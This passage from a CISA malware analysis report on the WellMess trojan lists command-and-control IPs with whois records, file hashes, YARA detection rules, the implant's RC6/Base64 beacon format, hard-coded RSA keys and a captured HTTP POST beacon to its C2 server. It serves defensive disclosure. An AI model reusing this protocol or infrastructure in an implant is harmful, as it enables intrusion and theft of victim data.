TCP\r\nWhois\r\ninetnum:        141.98.212.0 - 141.98.212.255\r\nnetname:        EstNOC-HongKong\r\ndescr:         EstNOC-Global\r\ncountry:        HK\r\nadmin-c:        EE2159-RIPE\r\ntech-c:         EE2159-RIPE\r\nabuse-c:        ACRO394-RIPE\r\nmnt-routes:     ESTNOC-MNT\r\nmnt-domains:    ESTNOC-MNT\r\nmnt-lower:     ESTNOC-MNT\r\nstatus:         SUB-ALLOCATED PA\r\nremarks:        - - - LEGAL CONCERNS - - -\r\nremarks:        For any legal requests, please send an E-mail to\r\nremarks:        eu-legal@estnoc.ee for a maximum of 48hours response.\r\nremarks:        - - - LEGAL CONCERNS - - -\r\norg:            ORG-EA968-RIPE\r\nmnt-by:         ESTNOC-MNT\r\ncreated:        2019-02-18T10:02:16Z\r\nlast-modified: 2020-06-01T20:40:40Z\r\nsource:         RIPE\r\norganisation: ORG-EA968-RIPE\r\norg-name:     ESTNOC-GLOBAL\r\norg-type:     OTHER\r\naddress:        Estonia, Parnumaa, Tori vald, Muti kyla, 86811\r\ne-mail:         webmaster@estnoc.ee\r\nabuse-c:        ACRO394-RIPE\r\nmnt-ref:        ESTNOC-MNT\r\nmnt-by:         ESTNOC-MNT\r\ncreated:        2016-03-02T22:52:16Z\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 22 of 44\n\nlast-modified: 2018-09-19T21:55:53Z\r\nsource:         RIPE\r\nperson:         Ego Ennok\r\naddress:        Estonia, Parnumaa, Tori vald, Muti kyla, 86811\r\nphone:         +37258501736\r\nnic-hdl:        EE2159-RIPE\r\nmnt-by:         ESTNOC-MNT\r\ncreated:        2016-03-02T21:24:09Z\r\nlast-modified: 2016-03-02T21:24:09Z\r\nsource:         RIPE\r\nRelationships\r\n141.98.212.55 Connected_From 5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\r\nDescription\r\n5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb attempts to connect to the IP address.\r\n209.58.186.196\r\nTags\r\ncommand-and-control\r\nPorts\r\n443 TCP\r\nWhois\r\ninetnum:        209.58.184.0 - 209.58.191.255\r\nnetname:        LSW-HKG-10\r\ncountry:        HK\r\nadmin-c:        LA249-AP\r\ntech-c:         LA249-AP\r\nstatus:         ALLOCATED NON-PORTABLE\r\nmnt-by:         MAINT-LSW-SG\r\nmnt-irt:        IRT-LSW-SG\r\nlast-modified: 2016-07-27T07:50:12Z\r\nsource:         APNIC\r\nirt:            IRT-LSW-SG\r\naddress:        18B Keong Saik Road, Singapore 089125\r\ne-mail:         apnic@sg.leaseweb.com\r\nabuse-mailbox: abuse@sg.leaseweb.com\r\nadmin-c:        LAPP1-AP\r\ntech-c:         LAPP1-AP\r\nauth:         # Filtered\r\nremarks:        abuse@sg.leaseweb.com was validated on 2019-12-12\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 23 of 44\n\nremarks:        apnic@sg.leaseweb.com was validated on 2020-06-03\r\nmnt-by:         MAINT-LSW-SG\r\nlast-modified: 2020-06-03T14:50:15Z\r\nsource:         APNIC\r\nperson:         LSW Apnic\r\naddress:        18B Keong Saik Road, Singapore 089125\r\ncountry:        SG\r\nphone:         +6531587350\r\ne-mail:         apnic@sg.leaseweb.com\r\nnic-hdl:        LA249-AP\r\nmnt-by:         MAINT-LSW-SG\r\nlast-modified: 2016-06-06T08:59:04Z\r\nsource:         APNIC\r\nRelationships\r\n209.58.186.196 Connected_From 5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\r\nDescription\r\n5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb attempts to connect to the IP address.\r\n7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\r\nTags\r\ntrojan\r\nDetails\r\nName 7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\r\nSize 6707096 bytes\r\nType ELF 64-bit LSB executable, x86-64, version 1 (SYSV)\r\nMD5 4d38ac3319b167f6c8acb16b70297111\r\nSHA1 01a71390892fad77987aa09a630b04ff72e37d5d\r\nSHA256 7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\r\nSHA512 aaae4d94f5a1b75917b2c948d4517928b457da0851f65a196b91f30ccd88645a1066b7111db6f7f2267092f8299520044cfcf4400f8285b01db6b\r\nssdeep 49152:Ik2WH801HarM2F75oeZbwriHBvV1WHr0q44gP1mZWPmoFjPnMBMaBJFtBE/k6rYD:ftHBHadoi+L0vcopfMnBz\r\nEntropy 6.005022\r\nAntivirus\r\nAntiy Trojan/Linux.Agent\r\nAvira LINUX/Agent.kiivu\r\nBitDefender Trojan.Linux.Generic.143453\r\nCyren ELF/Trojan.JTPD-6\r\nESET a variant of Linux/WellMess.B trojan\r\nEmsisoft Trojan.Linux.Generic.143453 (B)\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 24 of 44\n\nIkarus Trojan.Linux.Agent\r\nMcAfee GenericRXKJ-GH!4D38AC3319B1\r\nTrendMicro TROJ_FR.C35E7E37\r\nTrendMicro House Call TROJ_FR.C35E7E37\r\nYARA Rules\r\nrule CISA_10296782_01 : trojan WELLMESS\r\n{\r\nmeta:\r\n    Author = \"CISA Code \u0026 Media Analysis\"\r\n    Date= \"2020-07-06\"\r\n    Last_Modified=\"20200706_1017\"\r\n    Actor=\"n/a\"\r\n    Category=\"Trojan\"\r\n    Family=\"WellMess\"\r\n    Description = \"Detects WellMess implant and SangFor Exploit\"\r\n    MD5_1 = \"4d38ac3319b167f6c8acb16b70297111\"\r\n    SHA256_1 = \"7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\"\r\n    MD5_2 = \"a32e1202257a2945bf0f878c58490af8\"\r\n    SHA256_2 = \"a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\"\r\n    MD5_3 = \"861879f402fe3080ab058c0c88536be4\"\r\n    SHA256_3 = \"14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\"\r\n    MD5_4 = \"2f9f4f2a9d438cdc944f79bdf44a18f8\"\r\n    SHA256_4 = \"e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\"\r\n    MD5_5 = \"ae7a46529a0f74fb83beeb1ab2c68c5c\"\r\n    SHA256_5 = \"fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\"\r\n    MD5_6 = \"f18ced8772e9d1a640b8b4a731dfb6e0\"\r\n    SHA256_6 = \"953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\"\r\n    MD5_7 = \"3a9cdd8a5cbc3ab10ad64c4bb641b41f\"\r\n    SHA256_7 = \"5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\"\r\n    MD5_8 = \"967fcf185634def5177f74b0f703bdc0\"\r\n    SHA256_8 = \"58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\"\r\n    MD5_9 = \"c5d5cb99291fa4b2a68b5ea3ff9d9f9a\"\r\n    SHA256_9 = \"65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\"\r\n    MD5_10 = \"01d322dcac438d2bb6bce2bae8d613cb\"\r\n    SHA256_10 = \"0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494\"\r\n    MD5_11 = \"8777a9796565effa01b03cf1cea9d24d\"\r\n    SHA256_11 = \"83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18\"\r\n    MD5_12 = \"507bb551bd7073f846760d8b357b7aa9\"\r\n    SHA256_12 = \"47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 25 of 44\n\nstrings:\r\n    $0 = \"/home/ubuntu/GoProject/src/bot/botlib/chat.go\"\r\n    $1 = \"/home/ubuntu/GoProject/src/bot/botlib.Post\"\r\n    $2 = \"GoProject/src/bot/botlib.deleteFile\"\r\n    $3 = \"ubuntu/GoProject/src/bot/botlib.generateRandomString\"\r\n    $4 = \"GoProject/src/bot/botlib.AES_Decrypt\"\r\n    $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }\r\n    $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }\r\n    $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }\r\n    $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }\r\n    $9 = \"get_keyRC6\"\r\n    $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }\r\n    $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }\r\n    $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }\r\n    $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }\r\n    $14 = \"GoProject/src/bot/botlib.wellMess\"\r\n    $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }\r\n    $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }\r\n    $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }\r\n    $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }\r\n    $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }\r\n    $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }\r\n    $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }\r\n    $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }\r\n    $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }\r\n    $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61\r\n72 67 3E 2E 2A 3F }\r\n    $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }\r\n    $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }\r\n    $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }\r\ncondition:\r\n   ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14)\r\nor ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\n7c39841ba4... Connected_To 192.48.88.107\r\nDescription\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 26 of 44\n\nThis artifact is an ELF 64-bit file written in Go. It has been identified as a variant of the WellMess malware family. The\r\nprogram is capable of encrypting, decrypting, uploading and downloading files. The malware can also execute commands\r\nand send and receive encrypted communications.\r\nWhen the program is executed, it will attempt to contact its C2 at the IP address, 192.48.88.107 over TCP port 80. The\r\nprogram collects the IP address of the infected system, current username, and domain name to send to the C2. This data\r\nstring is appended with a unique SHA256 hash. The completed string is then RC6 encrypted and then Base64 encoded. Non-random characters are interspersed into the Base64 string for further obfuscation. The following is an example of the\r\nencoded string:\r\n—Begin Encoded String Example—\r\n9k90s+7zAwc+UNbXE+oav4+E0s9+aYCt+ICT+pu1e+hre8.+PkzUz+V7%2Cv0cl+V%2CEtY%2CN+bk4+ztw+S0Lg+UDlvkmX9k90s+7zAwc+UNbXE\r\n—End Encoded String Example—\r\nThe string is used to uniquely identify communication to and from the C2. The following is an example of the message\r\nformat:\r\n—Begin Message Format Example—\r\n\u003c;head;\u003e3230302e3230302e3230302e3232317c7c757365727c75736572e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\u003c;he\r\n\u003c;title;\u003erc\u003c;title;\u003e\u003c;service;\u003e\u003c;service;\u003e\r\n—End Message Format Example—\r\nIn the example, the string ‘rc’ between the \u003ctitle\u003e delimiters indicates that the bot is waiting for a command. The\r\nhexadecimal string between the \u003chead\u003e delimiters is the original encoded string. This string translates to the following:\r\n—Begin String Translated—\r\n200.200.200.221||user|user\r\n3230302e3230302e3230302e3232317c7c757365727c75736572e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\r\n—End String Translated—\r\nThe following Public Key is used for secure communication with the C2:\r\n— Begin Public Key—\r\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAh+WnVdCCA5i8cISqd+wR\r\nBZxqzhqwF71KW4Z+7yIiH9QeTUtlKYMlwxfre1ZcFM+QIpO9HyH4nJNe26r/nTH8\r\nxi4lfXomWmXpVs8CnjLe7eQCaFh5BJYbjCDSUopgfex/vxpdI/zDuxYlla8zKk6D\r\nic184naUNDbzbkR3/SuwV2kxA0EGGdlXi3LAL5aoD8xcR0PUaGuimhJQaO4fASwS\r\nBZvfx7km3xArlICnqbmrWzqnmh7j7K8eAmXH5pgDwGRR6ctJiS5nz9QlbxMOOhfI\r\nFKs9by/FpM+rA6gao7AdNTghvNKTVYSMi0U4UeaTSzKgH5EtqwZRXonSXQpk0ySl\r\nYwIDAQAB\r\n—End Public Key—\r\n192.48.88.107\r\nTags\r\ncommand-and-control\r\nPorts\r\n80 TCP\r\nHTTP Sessions\r\nPOST / HTTP/1.1\r\nHost: 192.48.88.107\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; zh-CN; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc12 Firefox/3.5.8\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 27 of 44\n\nContent-Length: 424\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nCookie:\r\nTnKTjksd=f8E+Pt5lxY+is2+wt6+bcu6jw8+9aYCtI+CTpu1eh+re8PkzU+yec.+mfxQxvn+6ml4Z9+K%2CDIgKP+BQHE+5LXS+tQOe+XBUzY+\r\nZlttbIG9=+6sd+H2kngW+I90kBVA.+OrUY+tLOuc%2C+mFfoZ+DAc1j+7p9QhJ+e1A+dZC%3A6+G9U.+1GEjt9+QhS+qWm+Rwu7Jf+4nn+X\r\nAccept-Encoding: gzip\r\nYY8 UbA0 U7z:bvW 2sqTlfH 1VGk 78N EHW Jcg:r NOyw6l. SmP qvt9FS 5Ybxb4 sfLof9w wWxosmu Jgny\r\nTyBx6K v:2r. BXpW vtOeg PLl exu7n muk4j7 pw6bgWG ,vyS8V I3X. fXHsyy 6dI: z0sErgo Vj4oJ XZB4 ncW52\r\nieNnER Kaa5Q. XL:, ,oxRsgT cMnL LolKz CWa h:: 4RIZT fq:wehz. YBE kNeQXQ oovyQ5 roI KViKu7 geO\r\nQK8L UNZHx. BfFwjYU 0O8L 4lAeAx3 OeQwG LVBwk aGvNJ di,QS egx. iftAs VHNhsKo Kzw bidAlf msozP\r\npaWl7Bm mCcx quHWA. tzqw PEj qdY9RP SxiwZw    \r\nWhois\r\nNetRange:     192.48.88.0 - 192.48.91.255\r\nCIDR:         192.48.88.0/22\r\nNetName:        TOCICI-NET04\r\nNetHandle:     NET-192-48-88-0-1\r\nParent:         NET192 (NET-192-0-0-0-0)\r\nNetType:        Direct Allocation\r\nOriginAS:     AS14613\r\nOrganization: TOCICI LLC (TOCIC)\r\nRegDate:        2012-12-03\r\nUpdated:        2012-12-03\r\nComment:        24hr NOC www.tocici.com\r\nRef:            https://rdap.arin.net/registry/ip/192.48.88.0\r\nOrgName:        TOCICI LLC\r\nOrgId:         TOCIC\r\nAddress:        25 NW 23PL\r\nAddress:        STE 6-345\r\nCity:         Portland\r\nStateProv:     OR\r\nPostalCode:     97210\r\nCountry:        US\r\nRegDate:        2009-11-16\r\nUpdated:        2017-01-28\r\nComment:        http://www.tocici.com\r\nRef:            https://rdap.arin.net/registry/entity/TOCIC\r\nRelationships\r\n192.48.88.107 Connected_From 7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\r\n192.48.88.107 Connected_From fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\r\nDescription\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 28 of 44\n\nfd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950 and\r\n7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee attempts to connect to the IP address.\r\nfd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\r\nTags\r\ntrojan\r\nDetails\r\nName fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\r\nSize 4121056 bytes\r\nType ELF 64-bit LSB executable, x86-64, version 1 (SYSV)\r\nMD5 ae7a46529a0f74fb83beeb1ab2c68c5c\r\nSHA1 a57c896486564d7663a4dce6fbf723a1deb81378\r\nSHA256 fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\r\nSHA512 85cba60ab37b138c271da13f899ee61434f56b24fa611e294e614f608fb8cf8b912fc59e0e5cd03070f57d01efadddd689edbaa65962f7ccfa6c70\r\nssdeep 49152:05RKx7rwGhSA/R/642M91Bj82r4W+26de59I5gj2P4yQmj:q2fwnA/V6g917B6o59Gbj\r\nEntropy 5.876729\r\nAntivirus\r\nAvira LINUX/Agent.itcql\r\nBitDefender Trojan.Linux.Generic.131015\r\nClamAV Unix.Trojan.WellMess-6706034-0\r\nESET a variant of Linux/WellMess.B trojan\r\nEmsisoft Trojan.Linux.Generic.131015 (B)\r\nIkarus Trojan.Linux.Agent\r\nYARA Rules\r\nrule CISA_10296782_01 : trojan WELLMESS\r\n{\r\nmeta:\r\n    Author = \"CISA Code \u0026 Media Analysis\"\r\n    Date= \"2020-07-06\"\r\n    Last_Modified=\"20200706_1017\"\r\n    Actor=\"n/a\"\r\n    Category=\"Trojan\"\r\n    Family=\"WellMess\"\r\n    Description = \"Detects WellMess implant and SangFor Exploit\"\r\n    MD5_1 = \"4d38ac3319b167f6c8acb16b70297111\"\r\n    SHA256_1 = \"7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\"\r\n    MD5_2 = \"a32e1202257a2945bf0f878c58490af8\"\r\n    SHA256_2 = \"a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\"\r\n    MD5_3 = \"861879f402fe3080ab058c0c88536be4\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 29 of 44\n\nSHA256_3 = \"14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\"\r\n    MD5_4 = \"2f9f4f2a9d438cdc944f79bdf44a18f8\"\r\n    SHA256_4 = \"e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\"\r\n    MD5_5 = \"ae7a46529a0f74fb83beeb1ab2c68c5c\"\r\n    SHA256_5 = \"fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\"\r\n    MD5_6 = \"f18ced8772e9d1a640b8b4a731dfb6e0\"\r\n    SHA256_6 = \"953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\"\r\n    MD5_7 = \"3a9cdd8a5cbc3ab10ad64c4bb641b41f\"\r\n    SHA256_7 = \"5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\"\r\n    MD5_8 = \"967fcf185634def5177f74b0f703bdc0\"\r\n    SHA256_8 = \"58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\"\r\n    MD5_9 = \"c5d5cb99291fa4b2a68b5ea3ff9d9f9a\"\r\n    SHA256_9 = \"65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\"\r\n    MD5_10 = \"01d322dcac438d2bb6bce2bae8d613cb\"\r\n    SHA256_10 = \"0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494\"\r\n    MD5_11 = \"8777a9796565effa01b03cf1cea9d24d\"\r\n    SHA256_11 = \"83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18\"\r\n    MD5_12 = \"507bb551bd7073f846760d8b357b7aa9\"\r\n    SHA256_12 = \"47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\"\r\nstrings:\r\n    $0 = \"/home/ubuntu/GoProject/src/bot/botlib/chat.go\"\r\n    $1 = \"/home/ubuntu/GoProject/src/bot/botlib.Post\"\r\n    $2 = \"GoProject/src/bot/botlib.deleteFile\"\r\n    $3 = \"ubuntu/GoProject/src/bot/botlib.generateRandomString\"\r\n    $4 = \"GoProject/src/bot/botlib.AES_Decrypt\"\r\n    $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }\r\n    $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }\r\n    $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }\r\n    $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }\r\n    $9 = \"get_keyRC6\"\r\n    $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }\r\n    $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }\r\n    $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }\r\n    $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }\r\n    $14 = \"GoProject/src/bot/botlib.wellMess\"\r\n    $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }\r\n    $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }\r\n    $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }\r\n    $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 30 of 44\n\n$19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }\r\n    $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }\r\n    $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }\r\n    $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }\r\n    $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }\r\n    $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61\r\n72 67 3E 2E 2A 3F }\r\n    $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }\r\n    $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }\r\n    $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }\r\ncondition:\r\n   ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14)\r\nor ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\nfd3969d323... Connected_To 192.48.88.107\r\nDescription\r\nThis artifact is an ELF 64-bit written in Go. It has been identified as a variant of the WellMess malware family.\r\nWhen executed, it attempts to collect the following data from the victim's system:\r\n—Begin Data Collected—\r\nIP address of the victim system\r\nCurrent username\r\nDomain name\r\n—End Data Collected—\r\nThe data is stored in the following format:\r\n—Begin Format—\r\n\"200.200.200.150||root|root|e3b0c44298fc1c149afbf4c8996fb924\"\r\n—End Format—\r\nThe victim's system data is used to generate a unique identifier which is hexadecimal encoded and stored in the format\r\nbelow as a unique identifier of the victim's system:\r\n—Begin Message Format—\r\n\"\r\n\u003c;head;\u003e3230302e3230302e3230302e3135307c7c726f6f747c726f6f74e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855/p\u003c;he\r\n\u003c;title;\u003ea:1_0\u003c;title;\u003e\u003c;service;\u003ep\u003c;service;\u003e\"\r\n—End Message Format—\r\nIn the message above, the hexadecimal string between the \u003chead\u003e delimiters is the original encoded string. Data between the\r\n\u003ctitle\u003e delimiters control the session, while data between the \u003cservice\u003e delimiters relate to commands. Some of the\r\ncommands include the following:\r\n—Begin Commands—\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 31 of 44\n\n(fu) File upload\r\n(fd) File download\r\n(u) Change user-agent string\r\n—End Commands—\r\nThe message above is encrypted with RC6 using a hard-coded encryption key. The encrypted data is then encoded using the\r\nBase64 encoding function. It trims Base64 \"=\" | \"/\" | \":\" and adds spaces with the\r\n\"_/home/ubuntu/GoProject/src/bot/botlib.Base64ToNormal\" function.\r\nThe following is an example of how the Base64 encoded data is trimmed:\r\n—Begin Base64 Encoded Data—\r\nTnKTjksd=f8E+Pt5lxY+is2+wt6+bcu6jw8+9aYCtI+CTpu1eh+re8PkzU+yec.+mfxQxvn+6ml4Z9+K%2CDIgKP+BQHE+5LXS+tQOe+XBUzY+8qxv.+\r\nZlttbIG9=+6sd+H2kngW+I90kBVA.+OrUY+tLOuc%2C+mFfoZ+DAc1j+7p9QhJ+e1A+dZC%3A6+G9U.+1GEjt9+QhS+qWm+Rwu7Jf+4nn+XBQ8lsO\r\n—End Base64 Encoded Data—\r\nThe final trimmed Base64 encoded data is stored in the “Cookie” header. The malware communicates with it C2 server at\r\nthe IP address 192.48.88.107 using HTTP requests which are RSA-encrypted and Base64 encoded. The \"Cookie\" header\r\nwill contain the RC6 encrypted information, including the system unique identifier, mentioned above. The bottom of the\r\nmessage body will contain a dynamically generated AES key, which is encrypted utilizing a hard-coded public RSA key.\r\nThe AES key will be utilized to secure the transfer of C2 data between the remote operator and the malware, including\r\nexecutable scripts, which are executed on the target system.\r\nAnalysis indicates that once a connection is established, the malware is designed to initiate a command and control service\r\nfrom the remote operator using the function \"_/home/ubuntu/GoProject/src/bot/botlib.Work\". It performs functions based on\r\nthe received commands:\r\n—Begin Functions—\r\nFile upload\r\nFile download\r\nChange user-agent string\r\n—End Functions—\r\nThe following Public Key is used for secure communication with the C2:\r\n—Begin Public Key—\r\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqU3sMUB/SEWHNe8xNSFG\r\nDMylqo/BsMvI9OdNb3keEuW57nmFctMiecNZu9c+ZGYTWBSU07cbxU045tlFOprY\r\nnhbnnnjgEDA9JCA12CUIJ5L74ERo8FuBLC18FoL5QtBrXm65RdxxuP3CRghg0amR\r\nS5aFpW8p3kpdIINXsXasnjFBw+q009u7w6rDXkK2hrpIvF2fzIrs7DrRwwKJ2lCf\r\nxgnhY00UWHohjOj3ecQQJMn71puy94pCmpv+7zAyCiYYTNyhC29xUAH1j6aBAVKI\r\nkuBXqd6461MJkGNI0pdIUev9BDeK74B7vmZ6TbQrdQ27+bNVTg6qqai+6vwLFxUB\r\nBwIDAQAB\r\n—End Public Key—\r\ne329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\r\nTags\r\ntrojan\r\nDetails\r\nName e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\r\nSize 6707096 bytes\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 32 of 44\n\nType ELF 64-bit LSB executable, x86-64, version 1 (SYSV)\r\nMD5 2f9f4f2a9d438cdc944f79bdf44a18f8\r\nSHA1 709878e13633e44b45ad1ab569ad34e3dc1efd3b\r\nSHA256 e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\r\nSHA512 9626f0896b5a657cd48ccb79fe5701e92b3def3210be596bcf561b8f20f3e7daa532654ab00351fcea7598348a76aa911f3cb8be796d38bca0223\r\nssdeep 49152:T8FWH8y/gahO9FcIXKtqEJnerv41WHrFq44gP1T1WPmoFjPnMBKBJ2f+r9O1Ogg3:ooHdgaMX1JLFv1opfMABT\r\nEntropy 6.006374\r\nAntivirus\r\nAntiy Trojan/Linux.Agent\r\nAvira LINUX/Agent.vkmrr\r\nBitDefender 